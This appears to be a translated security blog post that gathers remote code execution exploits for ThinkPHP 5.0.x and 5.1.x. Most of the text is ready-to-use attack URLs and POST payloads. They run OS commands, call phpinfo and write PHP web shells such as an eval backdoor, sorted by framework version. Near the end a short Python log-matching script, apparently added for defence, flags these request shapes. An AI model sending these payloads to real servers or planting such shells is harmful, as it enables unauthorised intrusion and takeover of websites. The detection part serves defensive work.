ThinkPHP 5.0.x series: another 0-day reported


Jumping on a hot topic.

The URL is: http://www.xxx.com/public/index.php?s=captcha

Submit via POST:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=net user




Here is also a roundup of the earlier 0-days in the ThinkPHP 5.x series.




1. Remote command execution via the system function

http://localhost:9096/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami



2. Output the phpinfo() information via the phpinfo function


http://localhost:9096/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1



3. Writing a shell:


http://localhost:9096/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_GET["code"])?^>>shell.php


http://localhost/thinkphp5.1/html/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php?echo?'ok';?>

--------------------- 












/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][][email protected]($_GET['fuck']);&fuck=phpinfo();

/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][][email protected]($_GET['fuck']);&fuck=eval($_POST[ian]);


/public/index.php?s=index/thinkContainer/invokefunction&function=call_user_func&vars[0]=phpinfo&vars[1]=1










POC

TP version 5.0.21:

http://localhost/thinkphp_5.0.21/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami



http://localhost/thinkphp_5.0.21/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1




TP version 5.0.22:

http://url/to/thinkphp_5.0.22/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami


http://url/to/thinkphp_5.0.22/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1





TP5.1.*

Using thinkphp5.1.29 as an example:


1. Code execution:

http://url/to/thinkphp5.1.29/?s=index/thinkRequest/input&filter=phpinfo&data=1


2. Command execution:

http://url/to/thinkphp5.1.29/?s=index/thinkRequest/input&filter=system&data=操作系统命令


3. File write (writing a shell):

http://url/to/thinkphp5.1.29/?s=index/thinktemplatedriverfile/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E


4. Unknown:

http://url/to/thinkphp5.1.29/?s=index/thinkviewdriverPhp/display&content=%3C?php%20phpinfo();?%3E


5. Code execution:

http://url/to/thinkphp5.1.29/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


6. Command execution:

http://url/to/thinkphp5.1.29/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令


7. Code execution:

http://url/to/thinkphp5.1.29/?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


8. Command execution:

http://url/to/thinkphp5.1.29/?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令
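
On the defensive side, the request shapes listed above can be matched in web server or WAF logs. The Python below is an added example, not part of the original article: `inspect_request`, the rule names and the sample requests are constructed for illustration, and it assumes the log pipeline also captures POST bodies.

```python
from urllib.parse import urlsplit, parse_qsl

# Last segment of the s= route -> request parameter that feeds it,
# taken from the request shapes listed on this page.
ROUTE_SINKS = {
    "invokefunction": "function",
    "input": "filter",
    "write": "cacheFile",
    "display": "content",
}


def inspect_request(target, body=""):
    """Return the rule names matched by one request (target is path?query)."""
    query = dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    form = dict(parse_qsl(body, keep_blank_values=True))
    hits = []

    # Rule 1: s= routes into a framework class (think...) rather than an
    # application controller, and the parameter that method consumes is set.
    route = query.get("s", "").strip("/").lower()
    method = route.rsplit("/", 1)[-1]
    if "think" in route and ROUTE_SINKS.get(method) in query:
        hits.append("think-route-sink")

    # Rule 2: _method=__construct together with filter[] / server[...] keys,
    # the POST shape shown at the top of the page.
    params = {**query, **form}
    if params.get("_method") == "__construct" and any(
        key.startswith(("filter", "server[")) for key in params
    ):
        hits.append("method-construct-override")
    return hits


# Constructed sample requests: (target, body). The last two are benign.
SAMPLES = [
    ("/public/index.php?s=index/thinkapp/invokefunction"
     "&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1", ""),
    ("/?s=index/thinkRequest/input&filter=phpinfo&data=1", ""),
    ("/public/index.php?s=captcha",
     "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"),
    ("/public/index.php?s=index/index/hello&name=think", ""),
    ("/public/index.php?s=captcha", "code=ab12"),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        print(inspect_request(target, body) or "clean", target)
```

Rule 1 keys on the final route segment and its parameter rather than the full class path, so it can also flag a legitimate application module whose name contains "think"; tune it against the application's real routes.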







This article was first published on the WeChat official account 零组攻防实验室: ThinkPHP 5.0.x series: another 0-day reported
